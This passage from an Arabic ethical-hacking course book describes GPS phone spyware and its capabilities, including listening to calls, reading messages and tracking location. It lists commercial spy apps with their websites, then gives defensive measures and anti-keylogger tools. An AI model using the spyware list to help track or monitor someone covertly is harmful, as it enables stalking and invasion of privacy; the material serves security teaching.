‫اﻟﮭدف ﻋن طرﯾﻖ اﻟدﺧول اﻟﻰ ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣﺣدد وﻋرض أﺛر اﻟﻧﻘطﺔ اﻟﻣﺗﺻﻠﺔ ﺑﺎﻟﮭدف واﻟﺗﻲ ﺗﻌﺑر ﻋن ﻣﻛﺎن اﻟﮭﺎﺗف ﻋﻠﻰ‬
‫اﻟﺧرﯾطﺔ‪ .‬ﯾرﺳل أﯾﺿﺎ إﺧطﺎرات اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻣن ﺗﻧﺑﯾﮭﺎت ﻋن ﻗرب اﻟﻣوﻗﻊ‪ .‬اﻟﻣﮭﺎﺟم ﯾﺗﺗﺑﻊ ﻣوﻗﻊ اﻟﺷﺧص اﻟﻣﺳﺗﮭدف ﺑﺎﺳﺗﺧدام ﺑراﻣﺞ‬
‫ﺗﺟﺳس ﺗﺣدﯾد اﻟﻣواﻗﻊ ﻛﻣﺎ ھو ﻣﺑﯾن ﻓﻲ اﻟﺷﻛل اﻟﺗﺎﻟﻲ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪428‬‬

‫‪GPS Spyware: SPYPhone‬‬


‫اﻟﻣﺻدر‪http://spyera.com :‬‬
‫‪ SPYPhone‬ھو ﺑراﻣﺞ ﺗﺟﺳس ‪ GPS‬اﻟﺗﻲ ﺗرﺳل ﻣوﻗﻊ ‪ GPS‬ﻟﻠﮭﺎﺗف اﻟﻣﺣﻣول اﻟﻣﺳﺗﮭدف ﻟﺣﺳﺎب اﻟوﯾب اﻟﺧﺎص ﺑك ﻋن طرﯾﻖ واي‬
‫ﻓﺎي‪ ،3G ،‬ﺟﻲ ﺑﻲ آر إس أو‪ . SMS‬ﺗﺣﺗﺎج إﻟﻰ ﺗﺛﺑﯾت ھذا اﻟﺑرﻧﺎﻣﺞ ﻋﻠﻰ اﻟﮭﺎﺗف اﻟﻣﺣﻣول اﻟﺗﻲ ﺗرﯾد ﺗﻌﻘﺑﮫ‪ .‬ﺳوف ‪Spyera Spyphone‬‬
‫ﯾﺳﺗﺧدم ‪ GPS‬ﻟﺗﺣدﯾد اﻟﻣواﻗﻊ ﻹظﮭﺎر إﺣداﺛﯾﺎت اﻟﺟﮭﺎز وﻣوﻗﻌﮫ اﻟﻔﻌﻠﻲ ﻋﻠﻰ اﻟﺧرﯾطﺔ داﺧل ﺣﺳﺎب اﻟوﯾب اﻟﺧﺎص ﺑك‪ .‬ﺑل ﯾﻣﻛﻧﮫ ﺗﻛوﯾن‬
‫إﻋدادات ﻟﻠﺣﺻول ﻋﻠﻰ اﻟﺗﺣدﯾﺛﺎت ﻓﻲ اﻟوﻗت اﻟﺣﻘﯾﻘﻲ‪ ،‬وﻋرض ﻣﺳﺎر اﻟﺳﻔر ﺑﯾن أوﻗﺎت ﻣﻌﯾﻧﺔ‪.‬‬
‫ﯾﻣﻛﻧك ﻓﻌل اﻷﺷﯾﺎء اﻟﺗﺎﻟﯾﺔ ﺑﺎﺳﺗﺧدام ھذا اﻟﺑرﻧﺎﻣﺞ‪:‬‬
‫‪ -‬اﻻﺳﺗﻣﺎع اﻟﻰ ﻣﺣﺎدﺛﺎت ﻣﻛﺎﻟﻣﺔ ھﺎﺗﻔﯾﺔ‪.‬‬
‫‪ -‬ﻗراءة اﻟرﺳﺎﺋل اﻟﻧﺻﯾﺔ اﻟﻘﺎدﻣﺔ ﻣن وإﻟﻰ اﻟﮭدف اﻟﻣﺗﺣرك‪.‬‬
‫‪ -‬ﻋرض ﻣﺣﻔوظﺎت اﻟﻣﻛﺎﻟﻣﺔ ﻟﻠﮭدف اﻟﻣﺗﺣرك‪.‬‬
‫‪ -‬ﺗﺣدﯾد ﻣوﻗﻊ اﻟﮭدف‪.‬‬
‫‪ -‬ﻗواﺋم اﻻﺗﺻﺎل واﻟوﺻول إﻟﻰ اﻟﺻور اﻟﺗﻲ اﻟﺗﻘطت‪.‬‬
‫‪ -‬ﻗراءة رﺳﺎﺋل اﻟدردﺷﺔ‪.‬‬
‫‪ -‬ﻗراءة اﻟرﻗم اﻟﺧﻠﯾوي اﺳم اﻟﮭدف اﻟﻣﺣﻣول‪.‬‬

‫‪GPS Spyware: other tools‬‬


‫ھﻧﺎك ﺑراﻣﺞ ﻣﺧﺗﻠﻔﺔ واﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﺗﺗﺑﻊ ﻣوﻗﻊ ﻣﻌﯾن ﻣن اﻷﺟﮭزة اﻟﻧﻘﺎﻟﺔ‪ .‬اﻟﻣﮭﺎﺟﻣﯾن ﯾﻣﻛﻧﮭم أﯾﺿﺎ اﻻﺳﺗﻔﺎدة ﻣن ﺑراﻣﺞ اﻟﺗﺟﺳس ‪GPS‬‬
‫اﻟﺗﺎﻟﯾﺔ ﻟﺗﺗﺑﻊ اﻟﻣوﻗﻊ ﻣن اﻟﮭواﺗف اﻟﻧﻘﺎﻟﺔ اﻟﮭدف‪:‬‬
‫‪EasyGPS available at http://www.easygps.com‬‬
‫‪FlexiSPY PRO-X available at http://www.flexispy.com‬‬
‫‪GPS TrackMaker Professional available at http://www.trackmaker.com‬‬
‫‪MOBILE SPY available at http://www.mobile-spy.com‬‬
‫‪World-Tracker available at http://www.world-tracker.com‬‬
‫‪ALL-in-ONE Spy available at http://www.thespyphone.com‬‬
‫‪Trackstick available at http://www.trackstick.com‬‬
‫‪Mobistealth Pro available at http://www.mobistealth.com‬‬
‫‪mSpy available at http://ar.mspy.com‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪429‬‬

‫‪How to Defend Against Keyloggers‬‬

‫اﻟﻛﯾﻠوﺟرز ھو ﺗطﺑﯾﻖ اﻟذي ﯾﻠﺗﻘط وﯾﺳﺟل ﺟﻣﯾﻊ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﺳرا ﺑﻣﺎ ﻓﻲ ذﻟك ﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻋﻠﻰ ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ‬
‫اﻟﻛﻣﺑﯾوﺗر‪ .‬ﻛﺎن اﻟﮭدف اﻟرﺋﯾﺳﻲ وراء ﺗطوﯾر ﺑرﻣﺟﯾﺎت ﻛﻠوﺟر اﻻﺳﺗﺧدام اﻹﯾﺟﺎﺑﻲ ﻣﺛل اﺳﺗﻌﺎدة اﻟﺑﯾﺎﻧﺎت اﻟﻣﻔﻘودة أو ﺣذف‪ ،‬أو ﻣراﻗﺑﺔ‬
‫اﻟﻣوظﻔﯾن واﻷطﻔﺎل‪ ،‬وﺗﺷﺧﯾص ﻣﺷﺎﻛل ﻧظﺎم اﻟﻛﻣﺑﯾوﺗر اﻷﺧرى‪ .‬وﻣﻊ ذﻟك‪ ،‬ﯾﺳﺗﺧدﻣﮭﺎ اﻟﻣﮭﺎﺟﻣون ﻷﻏراض أﺧرى ﺧﺑﯾﺛﺔ ﻣﺛل ﺳرﻗﺔ اﻟﮭوﯾﺔ‬
‫ﻣن اﻟﻣوظﻔﯾن‪ ،‬وﺗﻛﺳﯾر ﻛﻠﻣﺎت اﻟﺳر‪ ،‬واﻟﺣﺻول ﻋﻠﻰ ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن وأرﻗﺎم اﻟﮭواﺗف واﻟﺣﺳﺎب اﻟﻣﺻرﻓﻲ‪ ،‬واﻟﺣﺻول ﻋﻠﻰ دﺧول ﻏﯾر‬
‫ﻣﺻرح ﺑﮫ‪ ،‬وھﻠم ﺟرا‪ .‬ﻋﻠﻰ اﻟرﻏم ﻣن أﻧﮫ ﻣن اﻟﺻﻌب اﻟﻛﺷف ﻋن وﺟود ﻛﯾﻠوﺟرز ﺣﯾث أﻧﮭﺎ ﻣﺧﻔﯾﺔ ﻋﻠﻰ اﻟﻧظﺎم‪ ،‬ﻓﮭﻧﺎك ﻋدد ﻗﻠﯾل ﻣن اﻟطرق‬
‫ﻟﻠدﻓﺎع ﺿد ﻛﯾﻠوﺟرز‪:‬‬
‫‪ -‬ﺗﺛﺑﯾت ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت وﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﺗﺟﺳس‪ .‬ﺣﯾث أن اﻟﻔﯾروﺳﺎت‪ ،‬واﻟﺗرواﺟن‪ ،‬واﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ اﻷﺧرى ھﻲ‬
‫وﺳﺎﺋط واﻟﺗﻲ ﻣن ﺧﻼﻟﮭﺎ ﺗﻐزو ﺑرﻣﺟﯾﺎت اﻟﻛﯾﻠوﺟرز ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ .‬ﻣﻛﺎﻓﺢ اﻟﻔﯾروﺳﺎت وﻣﻛﺎﻓﺢ اﻟﺗﺟﺳس ھﻲ ﺧط اﻟدﻓﺎع اﻷول ﺿد‬
‫ﻛﯾﻠوﺟرز‪ .‬اﺳﺗﺧدام ﺗطﺑﯾﻘﺎت ﻟﺗﻧظﯾف ﻛﻠوﺟر ﻣﺗﺎﺣﺔ ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت‪ ،‬اﻟﻛﯾﻠوﺟرز اﻟﺗﻲ ﯾﺗم اﻟﻛﺷف ﻋﻧﮫ ﻣن ﻗﺑل ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ‬
‫اﻟﻔﯾروﺳﺎت ﯾﻣﻛن ﺣذﻓﮫ ﻣن اﻟﻛﻣﺑﯾوﺗر‪.‬‬
‫‪ -‬ﺗﺛﺑﯾت ‪ ،host-based IDS‬واﻟذي ﯾﻣﻛﻧﮫ رﺻد اﻟﻧظﺎم اﻟﺧﺎص ﺑك وﺗﻌطﯾل ﺗﺛﺑﯾت ﻛﯾﻠوﺟرز‪.‬‬
‫‪ -‬ﺗﻔﻌﯾل ﺟدران اﻟﺣﻣﺎﯾﺔ )‪(Firewall‬ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ .‬اﻟﺟدران اﻟﻧﺎرﯾﺔ )‪ (Firewall‬ﺗﻣﻧﻊ اﻟوﺻول إﻟﻰ ﺧﺎرج اﻟﻛﻣﺑﯾوﺗر‪.‬‬
‫اﻟﺟدران اﻟﻧﺎرﯾﺔ ﺗﻣﻧﻊ اﻧﺗﻘﺎل اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺳﺟﻠﺔ إﻟﻰ اﻟﻣﮭﺎﺟم‪.‬‬
‫‪ -‬ﺗﺗﺑﻊ اﻟﺑراﻣﺞ اﻟﺗﻲ ﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ .‬اﺳﺗﺧدام اﻟﺑرﻣﺟﯾﺎت اﻟﺗﻲ ﺗﻔﺣص ﺑﺷﻛل ﻣﺗﻛرر وﺗراﻗب اﻟﺗﻐﯾرات اﻟﺗﻲ طرأت‬
‫ﻋﻠﻰ اﻟﻧظﺎم أو اﻟﺷﺑﻛﺔ‪ .‬ﻛﯾﻠوﺟرز ﯾﻣﯾل ﻋﺎدة ﻟﻠﺗﺷﻐﯾل ﻓﻲ اﻟﺧﻠﻔﯾﺔ‪.‬‬
‫‪ -‬اﻟﺣﻔﺎظ ﻋﻠﻰ أﻧظﻣﺔ اﻷﺟﮭزة اﻟﺧﺎﺻﺔ ﺑك آﻣﻧﺔ ﻓﻲ ﺑﯾﺋﺔ ﻣؤﻣﻧﺔ‪ ،‬وﯾﻔﺿل اﻟﺗﺣﻘﻖ ﻛﺛﯾرا ﻣن ﻛﺎﺑﻼت ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ اﻟﻣوﺻﻠﺔ‪ ،‬ﻣﻧﻔذ‬
‫‪ ،USB‬وأﻟﻌﺎب اﻟﻛﻣﺑﯾوﺗر ﻣﺛل ‪ PS2‬اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧدﻣﮭﺎ ﻟﺗﺛﺑﯾت ﺑراﻣﺞ ﻛﻠوﺟر‪.‬‬
‫‪ -‬اﻟﺗﻌرف ﻋﻠﻰ وﺣذف رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻻﺣﺗﯾﺎﻟﯾﺔ )‪ (phishing emails‬ﻷن ﻣﻌظم اﻟﻣﮭﺎﺟﻣﯾن ﯾﺳﺗﺧدﻣوا رﺳﺎﺋل اﻟﺑرﯾد‬
‫اﻹﻟﻛﺗروﻧﻲ اﻟﺧﺎدﻋﺔ ﻛوﺳﯾﻠﺔ ﻟﻧﻘل ﺑرﻣﺟﯾﺎت اﻟﻛﯾﻠوﺟرز ﻟﻧظﺎم اﻟﺿﺣﯾﺔ‪.‬‬
‫‪ -‬ﺗﻔﻌﯾل ‪ pop-up blockers‬وﺗﻔﺎدى ﻓﺗﺢ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻏﯾر اﻟﻣرﻏوب ﻓﯾﮭﺎ وﻣرﻓﻘﺎﺗﮭﺎ‪.‬‬
‫‪ -‬ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت وﻣﻛﺎﻓﺣﺔ اﻟﺗﺟﺳس ﻗﺎدر ﻋﻠﻰ اﻟﻛﺷف ﻋﻠﻰ أي ﺷﻲء ﯾﺗم ﺗﺛﺑﯾﺗﮫ ﻋﻠﻰ اﻟﻧظﺎم‪ ،‬وﻟﻛن ﻣن اﻷﻓﺿل اﻟﻛﺷف ﻋن‬
‫ھذه اﻟﺑراﻣﺞ ﻗﺑل أن ﯾﺗم ﺗﺛﺑﯾﺗﮭﺎ‪ .‬ﻓﺣص اﻟﻣﻠﻔﺎت ﺟﯾدا ﻗﺑل ﺗﺛﺑﯾﺗﮭﺎ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر واﺳﺗﺧدام ‪ registry editor‬أو ‪process‬‬
‫‪ explorer‬ﻟﻠﺗﺣﻘﻖ ﻣن اﻟﻣﺗﻠﺻﺻﯾن‪.‬‬
‫‪ -‬اﺳﺗﺧدام ‪ USB‬ﻻﯾف ﻣﺣﻣﻲ ﺿد اﻟﻛﺗﺎﺑﺔ او ‪ CD/DVD‬ﻻﯾف ﻹﻋﺎدة ﺗﺷﻐﯾل اﻟﻛﻣﺑﯾوﺗر‪.‬‬
‫‪ -‬اﺳﺗﺧدام ﺑراﻣﺞ ﻣلء اﻟﻧﻣوذج اﻟﺗﻠﻘﺎﺋﻲ )‪ (automatic form-filling programs‬أو ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ اﻻﻓﺗراﺿﯾﺔ )‪(virtual keyboard‬‬
‫ﻹدﺧﺎل أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت اﻟﻣرور ﻷﻧﮭﺎ ﺗﺟﻧب اﻟﺗﻌرض ﻣن ﺧﻼل ﻛﯾﻠوﺟرز‪ .‬ﺑراﻣﺞ ﻣلء اﻟﻧﻣوذج ﺗﻠﻘﺎﺋﯾﺎ ﺳوف ﺗزﯾل‬
‫اﻟﺗﻌرض ﻻﺳﺗﺧدام ﻛﺗﺎﺑﺔ اﻟﺗﻔﺎﺻﯾل اﻟﺷﺧﺻﯾﺔ اﻟﺧﺎﺻﺔ ﺑك واﻟﻣﺎﻟﯾﺔ‪ ،‬أو اﻟﺳرﯾﺔ ﻣﺛل أرﻗﺎم ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن وﻛﻠﻣﺎت اﻟﺳر ﻣن ﺧﻼل‬
‫ﻟوﺣﺎت اﻟﻣﻔﺎﺗﯾﺢ‪.‬‬
‫‪ -‬اﺳﺗﺧدام ﺑراﻣﺞ ﺗدﺧل اﻟﻣﻔﺎﺗﯾﺢ)‪ ، (keystroke interference‬واﻟذي ﯾدرج اﻷﺣرف اﻟﻌﺷواﺋﯾﺔ ﻣﻊ ﻛل ﺿﻐطﺔ ﻣﻔﺎﺗﯾﺢ‪.‬‬
‫‪ -‬اﺳﺗﺧدام أداة اﻟﻣﺳﺎﻋدة ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﻟﻠﻣﻌﺎﻗﯾن )‪ (Windows on-screen keyboard accessibility‬ﻹدﺧﺎل ﻛﻠﻣﺔ اﻟﻣرور أو‬
‫أي ﻣﻌﻠوﻣﺎت ﺳرﯾﺔ أﺧرى‪ .‬ﯾﻣﻛﻧك اﻟﺣﻔﺎظ ﻋﻠﻰ ﺳرﯾﺔ اﻟﻣﻌﻠوﻣﺎت اﻟﺧﺎﺻﺔ ﺑك ﻷﻧﮫ ھﻧﺎ ﯾﺗم اﺳﺗﺧدام اﻟﻣﺎوس ﻹدﺧﺎل أي ﻣﻌﻠوﻣﺎت ﻣﺛل‬
‫ﻛﻠﻣﺎت اﻟﺳر‪ ،‬وأرﻗﺎم ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن‪ ،‬اﻟﺦ ﻓﻲ ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﺑدﻻ ﻣن ﻛﺗﺎﺑﺔ ﻛﻠﻣﺎت اﻟﺳر ﺑﺎﺳﺗﺧدام ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ‪.‬‬
‫‪ -‬ا ﺗﻧﻘر ﻋﻠﻰ وﺻﻼت ﻓﻲ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻏﯾر اﻟﻣرﻏوب ﻓﯾﮭﺎ أو اﻟﻣﺷﺑوھﺔ اﻟﺗﻲ ﻗد ﺗﺷﯾر ﻟك اﻟﻣواﻗﻊ اﻟﺧﺑﯾﺛﺔ‪.‬‬

‫اﻟﺗداﺑﯾر اﻟﻣﺿﺎدة اﻟﻣذﻛورة ﺣﺗﻰ اﻵن ﺗﺳﺗﺧدم ﻟﺗوﻓﯾر اﻟﺣﻣﺎﯾﺔ ﺿد ﺑرﻣﺟﯾﺎت اﻟﻛﯾﻠوﺟرز‪ .‬أﻣﺎ اﻵن ﺳوف ﻧﻧﺎﻗش اﻟﺗداﺑﯾر اﻟﻣﺿﺎدة ﻟﻠﺣﻣﺎﯾﺔ ﺿد‬
‫أﺟﮭزة اﻟﻛﯾﻠوﺟرز‪ .‬أﺟﮭزة اﻟﻛﯾﻠوﺟرز ھو اﻟﺟﮭﺎز اﻟذي ﯾﺳﺟل ﻛل ﺿﻐطﺔ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻋﻠﻰ ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ اﻟﻛﻣﺑﯾوﺗر ﻓﻲ اﻟوﻗت اﻟﺣﻘﯾﻘﻲ‪ .‬ﯾﺗم‬
‫ﺗوﺻﯾل ھذا اﻟﺟﮭﺎز ﻓﻲ اﻟﻣﻛﺎن ﻣﺎ ﺑﯾن ﺣﺎﻟﺔ اﻟﻛﻣﺑﯾوﺗر وﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ‪ .‬ﯾﺗم اﺳﺗﺧدام ﻛﻠوﻏر ﻛﺗطﺑﯾﻘﺎت اﻟﻣﺷروﻋﺔ ﻓﺿﻼ ﻋن اﻟﻣﮭﺎﺟﻣﯾن اﻟذﯾن‬
‫ﯾﺳﺗﺧدﻣوھﺎ ﻷﻏراض ﺧﺎدﻋﺔ ﻣﺛل ﺳرﻗﺔ ﻛﻠﻣﺎت اﻟﺳر وأرﻗﺎم اﻟﺣﺳﺎﺑﺎت اﻟﻣﺻرﻓﯾﺔ وأرﻗﺎم اﻟﮭﺎﺗف‪ ،‬وھﻠم ﺟرا‪ .‬ﻟﻠدﻓﺎع ﻋن اﻟﻧظﺎم اﻟﺧﺎص ﺑك‬
‫ﺿد ﻛﯾﻠوﺟرز‪ ،‬ﻧﺗﺑﻊ اﻟﻣﺿﺎدات اﻟﻣدرﺟﺔ ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬

‫ﺗﻘﯾﯾد اﻟوﺻول اﻟﻔﻌﻠﻲ إﻟﻰ أﻧظﻣﺔ اﻟﻛﻣﺑﯾوﺗر اﻟﺣﺳﺎﺳﺔ‪.‬‬ ‫‪-‬‬


‫ﻓﺣص دوري ﻟواﺟﮭﺔ ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﻟﺿﻣﺎن ﻋدم وﺟود ﻣﻛوﻧﺎت إﺿﺎﻓﯾﺔ ﯾﺗم ﺗوﺻﯾﻠﮭﺎ ﺑﻛﺑل ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ‪.‬‬ ‫‪-‬‬
‫ﻗﻔل ﻏرﻓﺔ اﻟﺧﺎدم‪.‬‬ ‫‪-‬‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬
‫‪430‬‬

‫ﻓﺣص دوري ﻟﻛل أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر واﻟﺗﺣﻘﻖ ﻣﺎ إذا ﻛﺎن ھﻧﺎك أي ﺟﮭﺎز ﻣﺗﺻل ﺑﮭم‪.‬‬ ‫‪-‬‬

‫‪Anti-Keyloggers‬‬
‫ﻣﻛﺎﻓﺣﺔ ﻛﯾﻠوﺟرز )‪ ،(Anti-Keyloggers‬وﺗﺳﻣﻰ أﯾﺿﺎ ‪ ،anti-keystroke loggers‬ﺻﻣﻣت ﺧﺻﯾﺻﺎ ﻟﻛﺷف وﺗﻌطﯾل ﺑراﻣﺞ ﺗﺳﺟﯾل‬
‫ﺿرﺑﺔ اﻟﻣﻔﺗﺎح)‪ . (keystroke logger‬ﺻﻣﻣت ﻣﺿﺎدات ﻛﯾﻠوﺟرز ﺧﺻﯾﺻﺎ ﻟﻐرض اﻟﻛﺷف ﻋن ﺑرﻣﺟﯾﺎت ﻛﯾﻠوﺟرز‪ .‬اﻟﻌدﯾد ﻣن اﻟﻣﻧظﻣﺎت‬
‫اﻟﻛﺑﯾرة‪ ،‬واﻟﻣؤﺳﺳﺎت اﻟﻣﺎﻟﯾﺔ‪ ،‬واﻟﺻﻧﺎﻋﺎت وﺷرﻛﺎت اﻷﻟﻌﺎب ﻋﺑر اﻹﻧﺗرﻧت‪ ،‬ﺑﺎﻹﺿﺎﻓﺔ اﻟﻰ اﻻﻓراد ﯾﺳﺗﺧدﻣوا )‪(Anti-Keyloggers‬‬
‫ﻣﺿﺎدات ﻛﯾﻠوﺟرز ﻟﺣﻣﺎﯾﺔ ﺧﺻوﺻﯾﺎﺗﮭم أﺛﻧﺎء اﺳﺗﺧدام اﻷﻧظﻣﺔ‪ .‬ھذه اﻟﺑراﻣﺞ ﺗﻣﻧﻊ ﻛﻠوﺟر ﻣن ﺗﺳﺟﯾل ﻛل ﺿﻐطﺔ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻣن ﻗﺑل اﻟﺿﺣﯾﺔ‬
‫وﯾﺑﻘﻲ ﻋﻠﻰ ﺟﻣﯾﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﺷﺧﺻﯾﺔ آﻣﻧﺔ وﻣﺄﻣوﻧﺔ اﻵن‪ .‬ﻣﺿﺎد اﻟﻛﯾﻠوﺟرز ﯾﻔﺣص ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ ،‬ﯾﻛﺗﺷف‪ ،‬وﯾزﯾل ﺑراﻣﺞ ﺗﺳﺟﯾل ﺿرﺑﺔ‬
‫اﻟﻣﻔﺗﺎح‪ .‬إذا ﻛﺎن اﻟﺑرﻧﺎﻣﺞ )ﻣﺿﺎدة اﻟﻛﯾﻠوﺟرز( ﯾﺟد أي ﺑرﻧﺎﻣﺞ ﯾﺳﺟل أي ﺿﻐطﺔ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك‪ ،‬ﻓﺈﻧﮫ ﯾﺣدده ﻋﻠﻰ اﻟﻔور‬
‫وإزاﻟﺗﮫ‪ ،‬ﺳواء ﻛﺎﻧت ﺑرﻧﺎﻣﺞ ﺗﺳﺟﯾل ﺿﻐط اﻟﻣﻔﺎﺗﯾﺢ ﻣﺷروﻋﺔ أو ﺑرﻧﺎﻣﺞ ﺗﺳﺟﯾل اﻟﺿﻐطﺔ ﻏﯾر ﺷرﻋﯾﺔ‪.‬‬

‫ﺑﻌض ﻣﺿﺎدات اﻟﻛﯾﻠوﺟرز ﺗﻛﺷف ﻋن وﺟود اﻟﻛﯾﻠوﺟرز اﻟﻣﺧﻔﻲ ﻋن طرﯾﻖ ﻣﻘﺎرﻧﺔ ﻛل اﻟﻣﻠﻔﺎت ﻓﻲ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر ﻣﻘﺎﺑل ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ﺗوﻗﯾﻊ‬
‫ﻛﯾﻠوﺟرز )‪ (signature database‬واﻟﺑﺣث ﻋن أوﺟﮫ اﻟﺗﺷﺎﺑﮫ‪ .‬ﺑﻌض اﻟﻣﺿﺎدة اﻷﺧرى ﻟﻠﻛﯾﻠوﺟرز ﺗﻛﺷف ﻋن وﺟود ﻛﯾﻠوﺟرز اﻟﻣﺧﺑﺄة ﻋن‬
‫طرﯾﻖ ﺣﻣﺎﯾﺔ ﻣﻠف ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ )‪ (keyboard driver‬واﻟﻛﯾرﻧل ﻣن اﻟﺗﻼﻋب‪ .‬ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ اﻻﻓﺗراﺿﯾﺔ )‪ (virtual keyboard‬أو‬
‫‪ touchscreen‬ﯾﺟﻌل ﻣﮭﻣﺔ اﻟﺗﻘﺎط اﻟﻣﻔﺎﺗﯾﺢ ﻣن ﺑرﻣﺟﯾﺎت اﻟﺗﺟﺳس اﻟﺧﺑﯾﺛﺔ أو ﺑراﻣﺞ اﻟﺗروﺟﺎن ﺻﻌﺑﺔ‪.‬‬

‫‪Anti-Keylogger: Zemana AntiLogger‬‬

‫اﻟﻣﺻدر‪http://www.zemana.com :‬‬
‫‪Zemana AntiLogger‬ھو ﺑرﻧﺎﻣﺞ أﻣﻧﻰ ﻋﺎﻟﻲ اﻷداء واﻟذى ﯾﻘوم ﺑﺣﻣﺎﯾﺔ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك ﻣن ھﺟﻣﺎت ﻛﻠوﺟر واﻟﺑراﻣﺞ‬
‫اﻟﺧﺑﯾﺛﺔ‪ ،‬وﺑﺎﻟﺗﺎﻟﻲ ﺣﻣﺎﯾﺔ ھوﯾﺗك‪ AntiLogger.‬ﺗﻘوم ﺑﺎﻟﻛﺷف ﻋن اﻟﺑراﻣﺞ اﻟﺿﺎرة ﻓﻲ اﻟوﻗت اﻟذي ﺗﮭﺎﺟم اﻟﻧظﺎم اﻟﺧﺎص ﺑك ﺑدﻻ ﻣن اﻟﻛﺷف‬
‫ﻋﻧﮭﺎ اﻟﻣﻌﺗﻣد ﻋﻠﻰ ﺑﺻﻣﺔ اﻟﺗوﻗﯾﻊ )‪ .(signature fingerprint‬ﺣﯾث إﻧﮫ ﺳوف ﯾﻘوم ﺑﺗﻧﺑﯾﮭك إذا ﺣﺎوﻟت أي ﻣن اﻟﺑرﻧﺎﻣﺞ اﻟﺧﺑﯾﺛﺔ اﻟﻘﯾﺎم‬
‫ﺑﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻣن اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪ ،‬او اﻟﺗﻘﺎط ﺻوره ﻟﻠﺷﺎﺷﺔ‪ ،‬او اﻟوﺻول إﻟﻰ اﻟﺣﺎﻓظﺔ اﻟﺧﺎﺻﺔ ﺑك‪ ،‬واﻟﻣﯾﻛروﻓون‪ ،‬او ﻛﺎﻣﯾرا‬
‫اﻟوﯾب‪ ،‬أو إﻗﺣﺎم ﻧﻔﺳﮫ ﻓﻲ أي اﻟﻣﻧﺎطﻖ اﻟﺣﺳﺎﺳﺔ ﻓﻲ اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪.‬‬
‫‪ Zemana AntiLogger‬ﯾوﻓر اﻟﺣﻣﺎﯾﺔ ﺿد اﻟﺗﮭدﯾدات اﻟﻣﺧﺗﻠﻔﺔ ﻣﺛل ﺗﺳﺟﯾل ‪ ،(SSL Logger) SSL‬وﺗﺳﺟﯾل ﻛﺎﻣﯾرا وﯾب )‪(webcam logger‬‬
